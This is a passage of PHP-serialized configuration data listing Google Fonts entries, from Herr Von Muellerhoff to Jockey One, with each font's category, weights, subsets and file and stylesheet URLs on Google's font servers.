Muellerhoff";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:96:"http://fonts.gstatic.com/s/herrvonmuellerhoff/v6/mmy24EUmk4tjm4gAEjUd7NLGIYrUsBdh-JWHYgiDiMU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:68:"https://fonts.googleapis.com/css?family=Herr+Von+Muellerhoff:regular";}}s:4:"hind";a:7:{s:4:"name";s:4:"Hind";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:5:{i:300;s:61:"http://fonts.gstatic.com/s/hind/v6/qa346Adgv9kPDXoD1my4kA.ttf";s:7:"regular";s:61:"http://fonts.gstatic.com/s/hind/v6/mktFHh5Z5P9YjGKSslSUtA.ttf";i:500;s:61:"http://fonts.gstatic.com/s/hind/v6/2cs8RCVcYtiv4iNDH1UsQQ.ttf";i:600;s:61:"http://fonts.gstatic.com/s/hind/v6/TUKUmFMXSoxloBP1ni08oA.ttf";i:700;s:61:"http://fonts.gstatic.com/s/hind/v6/cXJJavLdUbCfjxlsA6DqTw.ttf";}s:4:"urls";a:5:{i:300;s:48:"https://fonts.googleapis.com/css?family=Hind:300";s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Hind:regular";i:500;s:48:"https://fonts.googleapis.com/css?family=Hind:500";i:600;s:48:"https://fonts.googleapis.com/css?family=Hind:600";i:700;s:48:"https://fonts.googleapis.com/css?family=Hind:700";}}s:11:"hind_guntur";a:7:{s:4:"name";s:11:"Hind Guntur";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:6:"telugu";}s:5:"files";a:5:{i:300;s:88:"http://fonts.gstatic.com/s/hindguntur/v1/Szg33M7ab5MTWe-PWAcNAi9-WlPSxbfiI49GsXo3q0g.ttf";s:7:"regular";s:88:"http://fonts.gstatic.com/s/hindguntur/v1/MXz-KyAeVZstlFz6v-5SC6CWcynf_cDxXwCLxiixG1c.ttf";i:500;s:88:"http://fonts.gstatic.com/s/hindguntur/v1/Szg33M7ab5MTWe-PWAcNAsCNfqCYlB_eIx7H1TVXe60.ttf";i:600;s:88:"http://fonts.gstatic.com/s/hindguntur/v1/Szg33M7ab5MTWe-PWAcNApZ7xm-Bj30Bj2KNdXDzSZg.ttf";i:700;s:88:"http://fonts.gstatic.com/s/hindguntur/v1/Szg33M7ab5MTWe-PWAcNAne1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:5:{i:300;s:55:"https://fonts.googleapis.com/css?family=Hind+Guntur:300";s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Hind+Guntur:regular";i:500;s:55:"https://fonts.googleapis.com/css?family=Hind+Guntur:500";i:600;s:55:"https://fonts.googleapis.com/css?family=Hind+Guntur:600";i:700;s:55:"https://fonts.googleapis.com/css?family=Hind+Guntur:700";}}s:12:"hind_madurai";a:7:{s:4:"name";s:12:"Hind Madurai";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:5:"tamil";i:2;s:9:"latin-ext";}s:5:"files";a:5:{i:300;s:89:"http://fonts.gstatic.com/s/hindmadurai/v1/sdSJTZLdRXJhVTP92m2S66cQoVhARpoaILP7amxE_8g.ttf";s:7:"regular";s:89:"http://fonts.gstatic.com/s/hindmadurai/v1/pJpl47LatORZNWf8rgdiyS3USBnSvpkopQaUR-2r7iU.ttf";i:500;s:89:"http://fonts.gstatic.com/s/hindmadurai/v1/sdSJTZLdRXJhVTP92m2S65MQuUSAwdHsY8ov_6tk1oA.ttf";i:600;s:89:"http://fonts.gstatic.com/s/hindmadurai/v1/sdSJTZLdRXJhVTP92m2S62v8CylhIUtwUiYO7Z2wXbE.ttf";i:700;s:89:"http://fonts.gstatic.com/s/hindmadurai/v1/sdSJTZLdRXJhVTP92m2S60D2ttfZwueP-QU272T9-k4.ttf";}s:4:"urls";a:5:{i:300;s:56:"https://fonts.googleapis.com/css?family=Hind+Madurai:300";s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Hind+Madurai:regular";i:500;s:56:"https://fonts.googleapis.com/css?family=Hind+Madurai:500";i:600;s:56:"https://fonts.googleapis.com/css?family=Hind+Madurai:600";i:700;s:56:"https://fonts.googleapis.com/css?family=Hind+Madurai:700";}}s:13:"hind_siliguri";a:7:{s:4:"name";s:13:"Hind Siliguri";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:7:"bengali";}s:5:"files";a:5:{i:300;s:90:"http://fonts.gstatic.com/s/hindsiliguri/v2/fBpmjMpv5Rh6S25yVfWJnzoJ52uD-1fmXmi8u0n_zsc.ttf";s:7:"regular";s:90:"http://fonts.gstatic.com/s/hindsiliguri/v2/f2eEi2pbIa8eBfNwpUl0Am_MnNA9OgK8I1F23mNWOpE.ttf";i:500;s:90:"http://fonts.gstatic.com/s/hindsiliguri/v2/fBpmjMpv5Rh6S25yVfWJn__2zpxNHQ3utWt_82o9dAo.ttf";i:600;s:90:"http://fonts.gstatic.com/s/hindsiliguri/v2/fBpmjMpv5Rh6S25yVfWJn-x91FDzFvnud68bXrNkpDA.ttf";i:700;s:90:"http://fonts.gstatic.com/s/hindsiliguri/v2/fBpmjMpv5Rh6S25yVfWJn6iiXuG_rGcOxkuidirlnJE.ttf";}s:4:"urls";a:5:{i:300;s:57:"https://fonts.googleapis.com/css?family=Hind+Siliguri:300";s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Hind+Siliguri:regular";i:500;s:57:"https://fonts.googleapis.com/css?family=Hind+Siliguri:500";i:600;s:57:"https://fonts.googleapis.com/css?family=Hind+Siliguri:600";i:700;s:57:"https://fonts.googleapis.com/css?family=Hind+Siliguri:700";}}s:13:"hind_vadodara";a:7:{s:4:"name";s:13:"Hind Vadodara";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:5:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:8:"gujarati";i:2;s:9:"latin-ext";}s:5:"files";a:5:{i:300;s:90:"http://fonts.gstatic.com/s/hindvadodara/v2/KrZ6f_YevRawHvh0qDBkTbDwfZ__Dotj_J8NiWv76DQ.ttf";s:7:"regular";s:90:"http://fonts.gstatic.com/s/hindvadodara/v2/9c6KKeibr6NtFqknnNxZB-Dcg5akpSnIcsPhLOFv7l8.ttf";i:500;s:90:"http://fonts.gstatic.com/s/hindvadodara/v2/KrZ6f_YevRawHvh0qDBkTZzEKvFIU9WyojfbAkhDb6c.ttf";i:600;s:90:"http://fonts.gstatic.com/s/hindvadodara/v2/KrZ6f_YevRawHvh0qDBkTfgXs2VXrZsRiQ1c96pXZKI.ttf";i:700;s:90:"http://fonts.gstatic.com/s/hindvadodara/v2/KrZ6f_YevRawHvh0qDBkTYGjoH95IEFGA7BjhXnx_eg.ttf";}s:4:"urls";a:5:{i:300;s:57:"https://fonts.googleapis.com/css?family=Hind+Vadodara:300";s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Hind+Vadodara:regular";i:500;s:57:"https://fonts.googleapis.com/css?family=Hind+Vadodara:500";i:600;s:57:"https://fonts.googleapis.com/css?family=Hind+Vadodara:600";i:700;s:57:"https://fonts.googleapis.com/css?family=Hind+Vadodara:700";}}s:15:"holtwood_one_sc";a:7:{s:4:"name";s:15:"Holtwood One SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/holtwoodonesc/v7/sToOq3cIxbfnhbEkgYNuBbAgSRh1LpJXlLfl8IbsmHg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=Holtwood+One+SC:regular";}}s:14:"homemade_apple";a:7:{s:4:"name";s:14:"Homemade Apple";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/homemadeapple/v6/yg3UMEsefgZ8IHz_ryz86BiPOmFWYV1WlrJkRafc4c0.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Homemade+Apple:regular";}}s:8:"homenaje";a:7:{s:4:"name";s:8:"Homenaje";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/homenaje/v5/v0YBU0iBRrGdVjDNQILxtA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Homenaje:regular";}}s:15:"im_fell_dw_pica";a:7:{s:4:"name";s:15:"IM Fell DW Pica";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/imfelldwpica/v6/W81bfaWiUicLSPbJhW-ATsA5qm663gJGVdtpamafG5A.ttf";s:6:"italic";s:90:"http://fonts.gstatic.com/s/imfelldwpica/v6/alQJ8SK5aSOZVaelYoyT4PL2asmh5DlYQYCosKo6yQs.ttf";}s:4:"urls";a:2:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=IM+Fell+DW+Pica:regular";s:6:"italic";s:62:"https://fonts.googleapis.com/css?family=IM+Fell+DW+Pica:italic";}}s:18:"im_fell_dw_pica_sc";a:7:{s:4:"name";s:18:"IM Fell DW Pica SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:92:"http://fonts.gstatic.com/s/imfelldwpicasc/v6/xBKKJV4z2KsrtQnmjGO17JZ9RBdEL0H9o5qzT1Rtof4.ttf";}s:4:"urls";a:1:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=IM+Fell+DW+Pica+SC:regular";}}s:19:"im_fell_double_pica";a:7:{s:4:"name";s:19:"IM Fell Double Pica";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:94:"http://fonts.gstatic.com/s/imfelldoublepica/v6/yN1wY_01BkQnO0LYAhXdUol14jEdVOhEmvtCMCVwYak.ttf";s:6:"italic";s:94:"http://fonts.gstatic.com/s/imfelldoublepica/v6/64odUh2hAw8D9dkFKTlWYq0AWwkgdQfsRHec8TYi4mI.ttf";}s:4:"urls";a:2:{s:7:"regular";s:67:"https://fonts.googleapis.com/css?family=IM+Fell+Double+Pica:regular";s:6:"italic";s:66:"https://fonts.googleapis.com/css?family=IM+Fell+Double+Pica:italic";}}s:22:"im_fell_double_pica_sc";a:7:{s:4:"name";s:22:"IM Fell Double Pica SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:96:"http://fonts.gstatic.com/s/imfelldoublepicasc/v6/jkrUtrLFpMw4ZazhfkKsGwc4LoC4OJUqLw9omnT3VOU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:70:"https://fonts.googleapis.com/css?family=IM+Fell+Double+Pica+SC:regular";}}s:15:"im_fell_english";a:7:{s:4:"name";s:15:"IM Fell English";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/imfellenglish/v6/xwIisCqGFi8pff-oa9uSVHGNmx1fDm-u2eBJHQkdrmk.ttf";s:6:"italic";s:91:"http://fonts.gstatic.com/s/imfellenglish/v6/Z3cnIAI_L3XTRfz4JuZKbuewladMPCWTthtMv9cPS-c.ttf";}s:4:"urls";a:2:{s:7:"regular";s:63:"https://fonts.googleapis.com/css?family=IM+Fell+English:regular";s:6:"italic";s:62:"https://fonts.googleapis.com/css?family=IM+Fell+English:italic";}}s:18:"im_fell_english_sc";a:7:{s:4:"name";s:18:"IM Fell English SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/imfellenglishsc/v6/h3Tn6yWfw4b5qaLD1RWvz5ATixNthKRRR1XVH3rJNiw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=IM+Fell+English+SC:regular";}}s:20:"im_fell_french_canon";a:7:{s:4:"name";s:20:"IM Fell French Canon";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/imfellfrenchcanon/v6/iKB0WL1BagSpNPz3NLMdsJ3V2FNpBrlLSvqUnERhBP8.ttf";s:6:"italic";s:95:"http://fonts.gstatic.com/s/imfellfrenchcanon/v6/owCuNQkLLFW7TBBPJbMnhRa-QL94KdW80H29tcyld2A.ttf";}s:4:"urls";a:2:{s:7:"regular";s:68:"https://fonts.googleapis.com/css?family=IM+Fell+French+Canon:regular";s:6:"italic";s:67:"https://fonts.googleapis.com/css?family=IM+Fell+French+Canon:italic";}}s:23:"im_fell_french_canon_sc";a:7:{s:4:"name";s:23:"IM Fell French Canon SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:97:"http://fonts.gstatic.com/s/imfellfrenchcanonsc/v6/kA3bS19-tQbeT_iG32EZmaiyyzHwYrAbmNulTz423iM.ttf";}s:4:"urls";a:1:{s:7:"regular";s:71:"https://fonts.googleapis.com/css?family=IM+Fell+French+Canon+SC:regular";}}s:20:"im_fell_great_primer";a:7:{s:4:"name";s:20:"IM Fell Great Primer";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:95:"http://fonts.gstatic.com/s/imfellgreatprimer/v6/AL8ALGNthei20f9Cu3e93rgeX3ROgtTz44CitKAxzKI.ttf";s:6:"italic";s:95:"http://fonts.gstatic.com/s/imfellgreatprimer/v6/1a-artkXMVg682r7TTxVY1_YG2SFv8Ma7CxRl1S3o7g.ttf";}s:4:"urls";a:2:{s:7:"regular";s:68:"https://fonts.googleapis.com/css?family=IM+Fell+Great+Primer:regular";s:6:"italic";s:67:"https://fonts.googleapis.com/css?family=IM+Fell+Great+Primer:italic";}}s:23:"im_fell_great_primer_sc";a:7:{s:4:"name";s:23:"IM Fell Great Primer SC";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:97:"http://fonts.gstatic.com/s/imfellgreatprimersc/v6/A313vRj97hMMGFjt6rgSJtRg-ciw1Y27JeXb2Zv4lZQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:71:"https://fonts.googleapis.com/css?family=IM+Fell+Great+Primer+SC:regular";}}s:7:"iceberg";a:7:{s:4:"name";s:7:"Iceberg";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/iceberg/v4/p2XVm4M-N0AOEEOymFKC5w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Iceberg:regular";}}s:7:"iceland";a:7:{s:4:"name";s:7:"Iceland";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/iceland/v5/kq3uTMGgvzWGNi39B_WxGA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Iceland:regular";}}s:7:"imprima";a:7:{s:4:"name";s:7:"Imprima";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/imprima/v4/eRjquWLjwLGnTEhLH7u3kA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Imprima:regular";}}s:11:"inconsolata";a:7:{s:4:"name";s:11:"Inconsolata";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/inconsolata/v14/7bMKuoy6Nh0ft0SHnIGMuaCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:90:"http://fonts.gstatic.com/s/inconsolata/v14/AIed271kqQlcIRSOnQH0yXe1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:2:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Inconsolata:regular";i:700;s:55:"https://fonts.googleapis.com/css?family=Inconsolata:700";}}s:5:"inder";a:7:{s:4:"name";s:5:"Inder";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/inder/v5/C38TwecLTfKxIHDc_Adcrw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Inder:regular";}}s:12:"indie_flower";a:7:{s:4:"name";s:12:"Indie Flower";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/indieflower/v8/10JVD_humAd5zP2yrFqw6i3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Indie+Flower:regular";}}s:5:"inika";a:7:{s:4:"name";s:5:"Inika";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/inika/v4/eZCrULQGaIxkrRoGz_DjhQ.ttf";i:700;s:62:"http://fonts.gstatic.com/s/inika/v4/bl3ZoTyrWsFun2zYbsgJrA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Inika:regular";i:700;s:49:"https://fonts.googleapis.com/css?family=Inika:700";}}s:14:"inknut_antiqua";a:7:{s:4:"name";s:14:"Inknut Antiqua";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:7:{i:0;s:3:"300";i:1;s:7:"regular";i:2;s:3:"500";i:3;s:3:"600";i:4;s:3:"700";i:5;s:3:"800";i:6;s:3:"900";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:7:{i:300;s:91:"http://fonts.gstatic.com/s/inknutantiqua/v1/CagoW52rBcslcXzHh6tVIg6hmPNSXwHGnJQCeQHKUMo.ttf";s:7:"regular";s:91:"http://fonts.gstatic.com/s/inknutantiqua/v1/VlmmTfOrxr3HfcnhMueX9arFJ4O13IHVxZbM6yoslpo.ttf";i:500;s:91:"http://fonts.gstatic.com/s/inknutantiqua/v1/CagoW52rBcslcXzHh6tVIiYCDvi1XFzRnTV7qUFsNgk.ttf";i:600;s:91:"http://fonts.gstatic.com/s/inknutantiqua/v1/CagoW52rBcslcXzHh6tVIjLEgY6PI0GrY6L00mykcEQ.ttf";i:700;s:91:"http://fonts.gstatic.com/s/inknutantiqua/v1/CagoW52rBcslcXzHh6tVIlRhfXn9P4_QueZ7VkUHUNc.ttf";i:800;s:91:"http://fonts.gstatic.com/s/inknutantiqua/v1/CagoW52rBcslcXzHh6tVInARjXVu2t2krcNTHiCb1qY.ttf";i:900;s:91:"http://fonts.gstatic.com/s/inknutantiqua/v1/CagoW52rBcslcXzHh6tVIrTsNy1JrFNT1qKy8j7W3CU.ttf";}s:4:"urls";a:7:{i:300;s:58:"https://fonts.googleapis.com/css?family=Inknut+Antiqua:300";s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Inknut+Antiqua:regular";i:500;s:58:"https://fonts.googleapis.com/css?family=Inknut+Antiqua:500";i:600;s:58:"https://fonts.googleapis.com/css?family=Inknut+Antiqua:600";i:700;s:58:"https://fonts.googleapis.com/css?family=Inknut+Antiqua:700";i:800;s:58:"https://fonts.googleapis.com/css?family=Inknut+Antiqua:800";i:900;s:58:"https://fonts.googleapis.com/css?family=Inknut+Antiqua:900";}}s:12:"irish_grover";a:7:{s:4:"name";s:12:"Irish Grover";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/irishgrover/v6/kUp7uUPooL-KsLGzeVJbBC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Irish+Grover:regular";}}s:9:"istok_web";a:7:{s:4:"name";s:9:"Istok Web";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:12:"cyrillic-ext";i:2;s:9:"latin-ext";i:3;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/istokweb/v10/RYLSjEXQ0nNtLLc4n7--dQ.ttf";s:6:"italic";s:87:"http://fonts.gstatic.com/s/istokweb/v10/kvcT2SlTjmGbC3YlZxmrl6CWcynf_cDxXwCLxiixG1c.ttf";i:700;s:87:"http://fonts.gstatic.com/s/istokweb/v10/2koEo4AKFSvK4B52O_Mwai3USBnSvpkopQaUR-2r7iU.ttf";s:9:"700italic";s:87:"http://fonts.gstatic.com/s/istokweb/v10/ycQ3g52ELrh3o_HYCNNUw3e1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Istok+Web:regular";s:6:"italic";s:56:"https://fonts.googleapis.com/css?family=Istok+Web:italic";i:700;s:53:"https://fonts.googleapis.com/css?family=Istok+Web:700";s:9:"700italic";s:59:"https://fonts.googleapis.com/css?family=Istok+Web:700italic";}}s:8:"italiana";a:7:{s:4:"name";s:8:"Italiana";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/italiana/v5/dt95fkCSTOF-c6QNjwSycA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Italiana:regular";}}s:9:"italianno";a:7:{s:4:"name";s:9:"Italianno";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/italianno/v6/HsyHnLpKf8uP7aMpDQHZmg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Italianno:regular";}}s:4:"itim";a:7:{s:4:"name";s:4:"Itim";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/itim/v1/HHV9WK2x5lUkc5bxMXG8Tw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Itim:regular";}}s:16:"jacques_francois";a:7:{s:4:"name";s:16:"Jacques Francois";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/jacquesfrancois/v4/_-0XWPQIW6tOzTHg4KaJ_M13D_4KM32Q4UmTSjpuNGQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Jacques+Francois:regular";}}s:23:"jacques_francois_shadow";a:7:{s:4:"name";s:23:"Jacques Francois Shadow";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:99:"http://fonts.gstatic.com/s/jacquesfrancoisshadow/v4/V14y0H3vq56fY9SV4OL_FASt0D_oLVawA8L8b9iKjbs.ttf";}s:4:"urls";a:1:{s:7:"regular";s:71:"https://fonts.googleapis.com/css?family=Jacques+Francois+Shadow:regular";}}s:5:"jaldi";a:7:{s:4:"name";s:5:"Jaldi";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/jaldi/v2/x1vR-bPW9a1EB-BUVqttCw.ttf";i:700;s:62:"http://fonts.gstatic.com/s/jaldi/v2/OIbtgjjEp3aVWtjF6WY8mA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Jaldi:regular";i:700;s:49:"https://fonts.googleapis.com/css?family=Jaldi:700";}}s:14:"jim_nightshade";a:7:{s:4:"name";s:14:"Jim Nightshade";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/jimnightshade/v4/_n43lYHXVWNgXegdYRIK9CF1W_bo0EdycfH0kHciIic.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Jim+Nightshade:regular";}}s:10:"jockey_one";a:7:{s:4:"name";s:10:"Jockey 